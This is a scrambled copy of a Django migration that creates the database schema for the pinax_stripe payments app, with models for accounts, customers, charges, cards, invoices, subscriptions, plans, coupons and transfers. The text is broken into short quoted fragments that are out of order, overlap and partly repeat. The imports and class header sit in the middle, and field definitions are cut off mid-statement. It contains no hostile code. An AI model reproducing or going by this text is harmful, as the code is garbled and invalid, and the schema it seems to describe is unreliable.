models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True, null=True)), ('source_type', models.TextField(blank=True, null=True)), ('statement_descriptor',", "to='pinax_stripe.Customer'), ), migrations.AddField( model_name='charge', name='invoice', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'), ), migrations.AddField( model_name='card',", "models.TextField(blank=True, null=True)), ('verification_due_by', models.DateTimeField(blank=True, null=True)), ('verification_timestamp', 
models.DateTimeField(blank=True, null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)), ('authorized', models.BooleanField(default=True)),", "models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)), ('address_city', models.TextField(blank=True)), ('address_state', models.TextField(blank=True)), ('address_country', models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)),", "null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off', models.PositiveIntegerField(blank=True, null=True)), ('redeem_by', models.DateTimeField(blank=True, null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True, null=True)),", "models.CharField(max_length=15)), ('brand', models.TextField(blank=True)), ('country', models.CharField(blank=True, max_length=2)), ('cvc_check', models.CharField(blank=True, max_length=15)), ('dynamic_last4', models.CharField(blank=True, max_length=4)), ('tokenization_method',", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2, max_digits=9)), ('attempted', models.NullBooleanField()), ('attempt_count',", "models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)), ('payout_statement_descriptor', models.TextField(blank=True, null=True)), ('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True, null=True)),", "migrations.CreateModel( name='BitcoinReceiver', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', 
models.DateTimeField(default=django.utils.timezone.now)),", "'abstract': False, }, ), migrations.CreateModel( name='TransferChargeFee', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('amount',", "('charges_enabled', models.BooleanField(default=False)), ('country', models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)), ('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency', models.CharField(max_length=3)), ('details_submitted',", "max_length=10)), ('delinquent', models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True, editable=False, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True,", "max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True, max_length=100)), ('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True,", "), migrations.AddField( model_name='invoice', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='customer', name='users', field=models.ManyToManyField(related_name='customers',", "max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off',", "jsonfield.fields import pinax.stripe.models class Migration(migrations.Migration): initial = True dependencies = [ 
migrations.swappable_dependency(settings.AUTH_USER_MODEL), ]", "options={ 'abstract': False, }, ), migrations.CreateModel( name='Event', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'), ), migrations.AddField( model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AddField(", "('legal_entity_address_postal_code', models.TextField(blank=True, null=True)), ('legal_entity_address_state', models.TextField(blank=True, null=True)), ('legal_entity_dob', models.DateField(blank=True, null=True)), ('legal_entity_first_name', models.TextField(blank=True, null=True)), ('legal_entity_gender',", "('statement_descriptor', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('closed', models.BooleanField(default=False)), ('description', models.TextField(blank=True)), ('paid', models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)),", "models.TextField(blank=True, null=True)), ('legal_entity_address_line1', models.TextField(blank=True, null=True)), ('legal_entity_address_line2', models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True, null=True)), ('legal_entity_address_state', models.TextField(blank=True,", "('source', models.CharField(blank=True, max_length=100)), ('currency', models.CharField(default='usd', max_length=10)), ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('amount_refunded', models.DecimalField(blank=True,", "options={ 'abstract': False, }, ), migrations.CreateModel( name='Plan', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "}, 
bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Transfer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2, max_digits=9)), ('attempted', models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True)), ('currency', models.CharField(default='usd',", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()), ('validated_message',", "('legal_entity_first_name', models.TextField(blank=True, null=True)), ('legal_entity_gender', models.TextField(blank=True, null=True)), ('legal_entity_last_name', models.TextField(blank=True, null=True)), ('legal_entity_maiden_name', models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided',", "('request', models.CharField(blank=True, max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True, max_length=100)), ('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')),", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)),", "default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), 
migrations.CreateModel( name='Subscription', fields=[", "import Decimal from django.conf import settings from django.db import migrations, models import django.db.models.deletion", "('legal_entity_last_name', models.TextField(blank=True, null=True)), ('legal_entity_maiden_name', models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)),", "models.TextField(blank=True)), ('payment', models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)), ], options={ 'abstract': False,", "max_digits=9)), ('attempted', models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('closed', models.BooleanField(default=False)),", "models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('created', models.DateTimeField(blank=True, null=True)), ('currency', models.CharField(default='usd', max_length=25)), ('date', models.DateTimeField()), ('description',", "'abstract': False, }, ), migrations.CreateModel( name='Card', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "options={ 'abstract': False, }, ), migrations.CreateModel( name='BankAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "('processed', models.BooleanField(default=False)), ('request', models.CharField(blank=True, max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True, max_length=100)), ('customer', 
models.ForeignKey(blank=True, null=True,", "max_length=200)), ('quantity', models.IntegerField(blank=True, null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')), ], options={ 'abstract': False, },", "null=True)), ('trial_start', models.DateTimeField(blank=True, null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ], options={ 'abstract':", "= [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Account', fields=[ ('id', models.CharField(editable=False, max_length=32,", "('support_phone', models.TextField(blank=True, null=True)), ('timezone', models.TextField(blank=True, null=True)), ('tos_acceptance_date', models.DateField(blank=True, null=True)), ('tos_acceptance_ip', models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent',", "('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField( model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "('active', models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)),", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()), ('account_holder_type', models.TextField()), ('bank_name', 
models.TextField(blank=True, null=True)),", "('delinquent', models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True, editable=False, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE,", "max_length=2)), ('cvc_check', models.CharField(blank=True, max_length=15)), ('dynamic_last4', models.CharField(blank=True, max_length=4)), ('tokenization_method', models.CharField(blank=True, max_length=15)), ('exp_month', models.IntegerField()), ('exp_year',", "models.TextField(blank=True)), ('paid', models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)), ('period_end', models.DateTimeField()), ('period_start', models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2, max_digits=9)), ('tax',", "('trial_end', models.DateTimeField(blank=True, null=True)), ('trial_start', models.DateTimeField(blank=True, null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ],", "('legal_entity_verification_document', models.TextField(blank=True, null=True)), ('legal_entity_verification_status', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key',", "name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='customer', name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL),", "('default_for_currency', models.BooleanField(default=False)), ('fingerprint', models.TextField()), 
('last4', models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number', models.TextField()), ('status', models.TextField()),", "models.PositiveIntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off', models.PositiveIntegerField(blank=True, null=True)), ('redeem_by', models.DateTimeField(blank=True, null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True,", "name='Customer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance',", "('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily', 'daily'), ('Weekly', 'weekly'), ('Monthly', 'monthly')], max_length=7, null=True)), ('payout_schedule_monthly_anchor',", "null=True)), ('business_url', models.TextField(blank=True, null=True)), ('charges_enabled', models.BooleanField(default=False)), ('country', models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)), ('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure',", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True, null=True)), ('business_url', models.TextField(blank=True, null=True)), ('charges_enabled',", "('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={", "models.TextField()), ('bank_name', models.TextField(blank=True, 
null=True)), ('country', models.TextField()), ('currency', models.TextField()), ('default_for_currency', models.BooleanField(default=False)), ('fingerprint', models.TextField()), ('last4',", "('period_start', models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2, max_digits=9)), ('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('tax_percent', models.DecimalField(blank=True, decimal_places=2,", "models.DateTimeField(blank=True, null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)), ('authorized', models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)),", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True, max_length=100)), ('currency', models.CharField(default='usd', max_length=10)), ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),", "('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off', models.PositiveIntegerField(blank=True, null=True)), ('redeem_by', models.DateTimeField(blank=True, null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True, null=True)), ('valid',", "models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)), ('period_end', models.DateTimeField()), ('period_start', models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2, max_digits=9)), ('tax', models.DecimalField(blank=True, decimal_places=2,", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(blank=True,", "models.CharField(max_length=3)), 
('details_submitted', models.BooleanField(default=False)), ('display_name', models.TextField(blank=True, null=True)), ('email', models.TextField(blank=True, null=True)), ('legal_entity_address_city', models.TextField(blank=True, null=True)), ('legal_entity_address_country',", "('timezone', models.TextField(blank=True, null=True)), ('tos_acceptance_date', models.DateField(blank=True, null=True)), ('tos_acceptance_ip', models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True, null=True)), ('payout_schedule_delay_days',", "models.DateTimeField(blank=True, null=True)), ('quantity', models.IntegerField()), ('start', models.DateTimeField()), ('status', models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True, null=True)), ('trial_start', models.DateTimeField(blank=True,", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts',", "model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether( name='useraccount', unique_together=set([('user', 'account')]), ), migrations.AlterUniqueTogether( name='plan', unique_together=set([('stripe_id',", "= True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Account', fields=[", "('livemode', models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True, null=True)), ('valid', models.NullBooleanField()), ('processed', models.BooleanField(default=False)), ('request', 
models.CharField(blank=True,", "models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True, null=True)), ('trial_start', models.DateTimeField(blank=True, null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')),", "django.conf import settings from django.db import migrations, models import django.db.models.deletion import django.utils.timezone import", "models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency', models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)), ('display_name', models.TextField(blank=True, null=True)), ('email', models.TextField(blank=True, null=True)),", "models.DateTimeField(blank=True, null=True)), ('current_period_end', models.DateTimeField(blank=True, null=True)), ('current_period_start', models.DateTimeField(blank=True, null=True)), ('ended_at', models.DateTimeField(blank=True, null=True)), ('quantity', models.IntegerField()),", "('debit_negative_balances', models.BooleanField(default=False)), ('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency', models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)), ('display_name', models.TextField(blank=True, null=True)),", "null=True)), ('routing_number', models.TextField()), ('status', models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')), ], options={ 'abstract': False,", "models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3, null=True)), ('cancel_at_period_end', 
models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True, null=True)), ('current_period_end',", "('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number', models.TextField()), ('status', models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')), ], options={", "('country', models.CharField(blank=True, max_length=2)), ('cvc_check', models.CharField(blank=True, max_length=15)), ('dynamic_last4', models.CharField(blank=True, max_length=4)), ('tokenization_method', models.CharField(blank=True, max_length=15)), ('exp_month',", "('line_type', models.CharField(max_length=50)), ('description', models.CharField(blank=True, max_length=200)), ('quantity', models.IntegerField(blank=True, null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')), ],", "('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts',", "on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Invoice', fields=[ ('id', models.CharField(editable=False,", "False, }, ), migrations.CreateModel( name='Customer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "null=True)), ('legal_entity_maiden_name', models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), 
('legal_entity_phone_number', models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True,", "to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField( model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ), migrations.AddField( model_name='invoiceitem',", "models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily', 'daily'), ('Weekly', 'weekly'), ('Monthly', 'monthly')], max_length=7,", "models.NullBooleanField()), ('captured', models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True, null=True)), ('available', models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True, null=True)),", "null=True)), ('verification_due_by', models.DateTimeField(blank=True, null=True)), ('verification_timestamp', models.DateTimeField(blank=True, null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)), ('authorized', models.BooleanField(default=True)), ('user',", "False, }, ), migrations.CreateModel( name='BitcoinReceiver', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Subscription', fields=[ ('id', models.CharField(editable=False,", "('default_currency', models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)), ('display_name', models.TextField(blank=True, null=True)), ('email', models.TextField(blank=True, null=True)), ('legal_entity_address_city', 
models.TextField(blank=True, null=True)),", "('disputed', models.NullBooleanField()), ('refunded', models.NullBooleanField()), ('captured', models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True, null=True)), ('available', models.BooleanField(default=False)),", "null=True)), ('authorized', models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False,", "options={ 'abstract': False, }, ), migrations.CreateModel( name='TransferChargeFee', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "('attempted', models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('closed', models.BooleanField(default=False)), ('description',", "related_name='charges', to='pinax_stripe.Customer'), ), migrations.AddField( model_name='charge', name='invoice', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'), ), migrations.AddField(", "('account_holder_type', models.TextField()), ('bank_name', models.TextField(blank=True, null=True)), ('country', models.TextField()), ('currency', models.TextField()), ('default_for_currency', models.BooleanField(default=False)), ('fingerprint', models.TextField()),", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(default='usd',", "] operations = [ migrations.CreateModel( name='Account', fields=[ 
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "options={ 'abstract': False, }, ), migrations.CreateModel( name='BitcoinReceiver', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='Subscription', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "models.PositiveIntegerField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off', models.PositiveIntegerField(blank=True, null=True)),", "Django 1.11.8 on 2018-08-06 19:00 from __future__ import unicode_literals from decimal import Decimal", "models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True, null=True)), ('legal_entity_verification_details', models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code',", "models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Invoice', fields=[", "('outcome', jsonfield.fields.JSONField(blank=True, null=True)), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Coupon',", "serialize=False)), ('stripe_id', models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)), ('interval_count',", 
"null=True)), ('verification_timestamp', models.DateTimeField(blank=True, null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)), ('authorized', models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3, null=True)), ('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True, null=True)), ('current_period_end', models.DateTimeField(blank=True, null=True)),", "}, ), migrations.CreateModel( name='Card', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True, null=True)), ('legal_entity_address_state', models.TextField(blank=True, null=True)), ('legal_entity_dob', models.DateField(blank=True, null=True)), ('legal_entity_first_name', models.TextField(blank=True, null=True)),", "('fingerprint', models.TextField()), ('last4', models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number', models.TextField()), ('status', models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Coupon', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "models.DateTimeField(blank=True, editable=False, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "on_delete=django.db.models.deletion.CASCADE, 
to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='customer', name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='charge',", "}, ), migrations.CreateModel( name='BitcoinReceiver', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "), migrations.CreateModel( name='Plan', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "max_digits=9, null=True)), ('created', models.DateTimeField(blank=True, null=True)), ('currency', models.CharField(default='usd', max_length=25)), ('date', models.DateTimeField()), ('description', models.TextField(blank=True, null=True)),", "name='Card', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name',", "null=True)), ('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True, null=True)), ('verification_due_by', models.DateTimeField(blank=True, null=True)), ('verification_timestamp', models.DateTimeField(blank=True, null=True)), ('verification_fields_needed',", "models.DateTimeField(blank=True, null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True, null=True)), ('valid', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ),", "models.TextField(blank=True, null=True)), ('email', models.TextField(blank=True, null=True)), ('legal_entity_address_city', models.TextField(blank=True, null=True)), 
('legal_entity_address_country', models.TextField(blank=True, null=True)), ('legal_entity_address_line1', models.TextField(blank=True,", "('description', models.TextField(blank=True, null=True)), ('destination', models.TextField(blank=True, null=True)), ('destination_payment', models.TextField(blank=True, null=True)), ('failure_code', models.TextField(blank=True, null=True)), ('failure_message',", "related_name='charge_fee_details', to='pinax_stripe.Transfer')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='UserAccount', fields=[ ('id', models.CharField(editable=False,", "models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True, null=True)), ('legal_entity_verification_details', models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True, null=True)),", "models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)), ('product_description',", "('verification_timestamp', models.DateTimeField(blank=True, null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)), ('authorized', models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts',", "False, }, ), migrations.CreateModel( name='UserAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "migrations.AddField( model_name='charge', name='customer', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'), ), 
